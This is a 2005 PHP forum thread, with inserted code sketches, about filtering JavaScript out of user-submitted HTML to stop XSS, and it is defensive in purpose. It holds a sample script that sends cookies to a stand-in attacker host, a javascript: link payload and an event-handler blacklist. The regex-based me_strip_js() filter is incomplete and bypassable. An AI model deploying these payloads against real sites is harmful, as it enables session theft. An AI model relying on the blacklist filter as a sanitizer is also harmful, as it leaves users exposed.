javascript =)

Posted: Sun Sep 25, 2005 11:06 am
by s.dot
Does all JavaScript need to be triggered by an event, such as onLoad, onMouseOver, onMouseOut, etc.?

If I replace all of these words with 'bswords' or something similar, will this effectively disable JavaScript?

Posted: Sun Sep 25, 2005 11:17 am
by feyd
The events are just one avenue JavaScript may be run from. Others include inline scripts and external source inclusion. At any rate, this feels like it should be in Security, if you want to filter the input to protect something...

Posted: Sun Sep 25, 2005 11:31 am
by s.dot
hmm... this was just my prerequisite to the security question. In order to protect against it, I needed to know how it can be delivered ;)

Edit: I guess this could be switched over to Security now =). As a first step to disabling JavaScript, I should filter the <script></script> tags. Perhaps strip_tags() would get rid of those. Then I'll replace all of the event words with something (yet to figure that out). Where should I go from there? I'm just trying to get the logic down in English, then translate that to code later.
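
A quick way to see what strip_tags() would and would not do here. This is only a sketch with two made-up input strings: the function removes the tags themselves but keeps the text between them, and any tag passed as allowed is kept with all of its attributes, event handlers included.

```php
<?php
// Two hypothetical inputs, invented for illustration.
$script_input = '<script>alert(1)</script>Hello';
$anchor_input = '<a href="#" onclick="evil()">link</a>';

// The <script> tags are removed, but the text between them is kept.
$no_tags = strip_tags($script_input);

// With <a> allowed, the tag survives together with every attribute on it.
$a_allowed = strip_tags($anchor_input, '<a>');

echo $no_tags, "\n";
echo $a_allowed, "\n";
```

So strip_tags() on its own neither removes the script body nor filters attributes on the tags it lets through.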

Posted: Sun Sep 25, 2005 1:50 pm
by Ambush Commander
Here's what I'm thinking.

1. Parse all tags and remove any that are not on a whitelist (<script></script> would not be on it). Check tags for well-formedness and make sure the nesting is correct.
2. Parse all attribute values to make sure they comply with the doctype and that the attribute is on your whitelist for that particular tag. So an A tag would have HREF whitelisted but not ONCLICK, and the attribute parser would make sure that HREF != "javascript:do_evil_stuff".
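
The two steps above could be sketched roughly as follows. This is not a finished library, just a minimal illustration that leans on PHP's DOM extension to do the parsing and nesting repair. The whitelist contents and the function name whitelist_html() are assumptions made up for the example, passing a node to saveHTML() needs PHP 5.3.6 or later, and loadHTML() assumes ISO-8859-1 input unless told otherwise.

```php
<?php
// Hypothetical whitelist: tag name => attributes allowed on that tag.
$allowed = array(
	'a' => array('href'),
	'b' => array(),
	'i' => array(),
	'p' => array(),
);

function whitelist_html($html, $allowed)
{
	$doc = new DOMDocument();
	// Wrap the input in a container div so the cleaned fragment can be
	// pulled back out. @ hides libxml warnings about sloppy markup.
	@$doc->loadHTML('<div>' . $html . '</div>');
	$root = $doc->getElementsByTagName('div')->item(0);

	// Copy the live node list into an array before changing the tree.
	$elements = array();
	foreach ($root->getElementsByTagName('*') as $el) {
		$elements[] = $el;
	}

	foreach ($elements as $el) {
		$tag = strtolower($el->nodeName);
		if (!isset($allowed[$tag])) {
			// Step 1: tag not on the whitelist, drop it and its contents.
			if ($el->parentNode) {
				$el->parentNode->removeChild($el);
			}
			continue;
		}

		// Step 2: collect attribute names first, then remove the ones
		// that are not whitelisted for this tag.
		$names = array();
		foreach ($el->attributes as $attr) {
			$names[] = $attr->nodeName;
		}
		foreach ($names as $name) {
			if (!in_array(strtolower($name), $allowed[$tag], true)) {
				$el->removeAttribute($name);
			}
		}

		// HREF must not be a javascript: URL. Whitespace and control
		// characters are stripped before the comparison.
		if ($el->hasAttribute('href')) {
			$href = preg_replace('/[\s\x00-\x20]+/', '', $el->getAttribute('href'));
			if (stripos($href, 'javascript:') === 0) {
				$el->removeAttribute('href');
			}
		}
	}

	// Serialise whatever is left inside the container div.
	$out = '';
	foreach ($root->childNodes as $child) {
		$out .= $doc->saveHTML($child);
	}
	return $out;
}

echo whitelist_html('<script>alert(1)</script><a href="/home" onclick="evil()">ok</a>', $allowed), "\n";
```

Dropping a non-whitelisted element together with its contents is a design choice. Keeping the inner text instead would be gentler on users but needs more care.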

By the way, if you end up doing all that, could you, like, release the code publicly? It would be a really nice HTML library. :D

I'm calling for a shoot first, ask questions later policy. Rather than asking yourself what you should get rid of, ask yourself what you should keep. But by doing this, a simple regexp solution will not work.

Ideally... You implement a doctype parser. You then extend that parser to include more restrictions that are not possible in current doctype syntaxes. Then, you build a simplified doctype for what you would consider "secure" (leave out definitions for SCRIPT et cetera). You may need to hardcode extra restrictions. Then, you feed it into a script that parses HTML tags. Allow for some smartness when correcting tags, like a Tidy-style project. Have the script parse everything, and then have it check the result against the doctype. Implement parsers for all the relevant RFC definitions, and whitelist those accordingly: this will be used for the attributes.

Of course, this is overkill

But it's still mad cool. X)

Posted: Thu Sep 29, 2005 8:43 am
by s.dot
well here's what I got so far.. it might not be as advanced as described above :P but it's a start..

Currently it replaces everything from <script... /script> with nothing.
Then replaces javascript event handlers with "badboy".
However I don't think this list is complete.

Code:

/* Strip javascript.. or attempt to */
function me_strip_js($string)
{
	/* Replace everything between <script></script> tags with nothing */
	$string = preg_replace('#<script.+?/script>#is', '', $string);

	/* If they didn't place an </script> tag, replace the <script> with nothing.
	   .*? rather than .+? so a bare <script> with no attributes is caught too */
	$string = preg_replace('#<script.*?>#is', '', $string);

	/* Javascript event handlers to look for (this list is not complete) */
	$handlers = array(
		'onabort', 'onblur', 'onchange', 'onclick', 'ondblclick', 'ondragdrop',
		'onerror', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload',
		'onmousedown', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup',
		'onmove', 'onreset', 'onresize', 'onselect', 'onsubmit', 'onunload',
	);

	/* Replace javascript event handlers that are inside of < >'s */
	foreach ($handlers as $handler) {
		$string = preg_replace('/(<[^>]*?)\b' . $handler . '\b(.+?>)/is', '$1badboy$2', $string);
	}

	/* Break iframe tags the same way */
	$string = preg_replace('/(<[^>]*?)\biframe\b(.+?>)/is', '$1badboy$2', $string);

	/* Return the result */
	return $string;
}
What would be my next step in removing javascript? Previously the only way I knew how to include javascript was with an event handler.

Posted: Thu Sep 29, 2005 8:56 am
by CoderGoblin
Now what would happen if I entered an iframe to load a subpage containing my JavaScript, which refers to its parent window? If the subpage is also processed this would not be a problem.

Posted: Thu Sep 29, 2005 8:57 am
by s.dot
you can't load an iframe, look at my last regex :P

Posted: Thu Sep 29, 2005 8:59 am
by CoderGoblin
Missed it... OK :wink:

Posted: Fri Sep 30, 2005 1:07 am
by pilau
Why would you want to disable all JavaScript?

Posted: Fri Sep 30, 2005 2:35 am
by n00b Saibot
pilau wrote: Why would you want to disable all JavaScript?
so that I would stop hacking his site :P

Posted: Fri Sep 30, 2005 10:12 pm
by Ambush Commander
You missed the pseudoprotocol javascript.

Code:

<a href="javascript:do_some_badstuff();">Don't click here!</a>
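
One way to close this hole, in keeping with the whitelist idea from earlier in the thread, is to check the URL scheme against a short list instead of hunting for "javascript:" specifically. The sketch below is only an illustration: url_is_allowed() and its default scheme list are made up for the example, and it assumes the attribute value has already been entity-decoded (as it would be if it came out of an HTML parser).

```php
<?php
// Hypothetical helper: accept a URL only if it is relative or uses a
// scheme on a short whitelist. The default list is an assumption.
function url_is_allowed($url, $schemes = array('http', 'https', 'mailto'))
{
	// Remove whitespace and control characters first, so that variants
	// such as "java<TAB>script:" are compared as "javascript:".
	$url = preg_replace('/[\s\x00-\x20]+/', '', $url);

	// A scheme is a letter followed by letters, digits, "+", "." or "-",
	// up to the first colon.
	if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
		return in_array(strtolower($m[1]), $schemes, true);
	}

	// No scheme at all: treat it as a relative URL.
	return true;
}

var_dump(url_is_allowed('javascript:do_some_badstuff();'));
var_dump(url_is_allowed('http://example.com/'));
var_dump(url_is_allowed('page.php?id=3'));
```

Because anything not on the list is refused, other script-capable schemes are rejected without having to be named one by one.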

Posted: Sat Oct 01, 2005 1:39 am
by n00b Saibot
drats! you told him :( now i will have to search another way :lol:

Posted: Sat Oct 01, 2005 11:40 am
by Ambush Commander
I also have a vague suspicion that it doesn't actually work on IFRAME tags (the \b thing prevents <iframe from matching)
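
That suspicion is easy to test. In PCRE, \b matches at any position between a word character and a non-word character, and < is a non-word character, so there should be a boundary between < and i. A minimal check, using the iframe pattern from the function posted above and a made-up input string:

```php
<?php
// The iframe pattern from me_strip_js(), unchanged.
$pattern = '/(<[^>]*?)\biframe\b(.+?>)/is';

// Hypothetical input for the test.
$input = '<iframe src="evil.html"></iframe>';

// 1 if the pattern matches somewhere in the input, 0 if it does not.
$matched = preg_match($pattern, $input);

// Apply the same replacement the function uses.
$result = preg_replace($pattern, '$1badboy$2', $input);

echo $matched, "\n";
echo $result, "\n";
```

If the pattern matches, the opening tag comes out renamed to badboy, which a browser will not treat as an iframe.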

Posted: Sat Oct 01, 2005 12:00 pm
by pilau
Again: why would you want to disable Javascript?

Posted: Sat Oct 01, 2005 12:20 pm
by Ambush Commander
JavaScript, being a programming language, can be exploited easily. While web browsers do the best they can to prevent the author of a page from abusing the user (such as preventing write access to a file upload field), they cannot protect a website from itself.

JavaScript has the ability to read and write cookies, as well as the ability to transmit their contents. Say I have a webpage that allows arbitrary HTML to be posted on it. An attacker could conceivably post a JavaScript snippet that would send the contents of all cookies to the attacker: an XSS attack. They could also make an infinite loop on a modal dialogue and render the browser useless (if you do while(true) alert('Haha!'); on Firefox, there is no way to abort except by using the Task Manager). You'd have to be a fool to allow user-submitted JavaScript on pages that are accessible by everyone.
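
For the case where the page does not actually need to accept HTML at all, the usual alternative to filtering is to escape everything on output, so the browser shows the markup as text instead of running it. A minimal sketch, with a made-up comment string and a placeholder attacker host:

```php
<?php
// Hypothetical user-submitted comment that tries to leak cookies.
$comment = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Escape <, >, & and both kinds of quotes before printing the comment.
$safe = htmlspecialchars($comment, ENT_QUOTES);

echo $safe, "\n";
```

This does not help when some HTML has to be allowed through, which is the harder problem the rest of the thread is about.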

There are notable exceptions. Wikipedia, for instance, offers a page called monobook.js to its users. Only the owner of this page is allowed to edit it, and the JavaScript written there is automatically included in their pages when they are logged in, but doesn't affect anyone else. When no one but the attacker can see the JavaScript, there is no security hole. But if people are writing content for the masses, can publish it without moderation (you can always try auditing JavaScript code for things that specifically need it), and can use JavaScript, that's a security hole.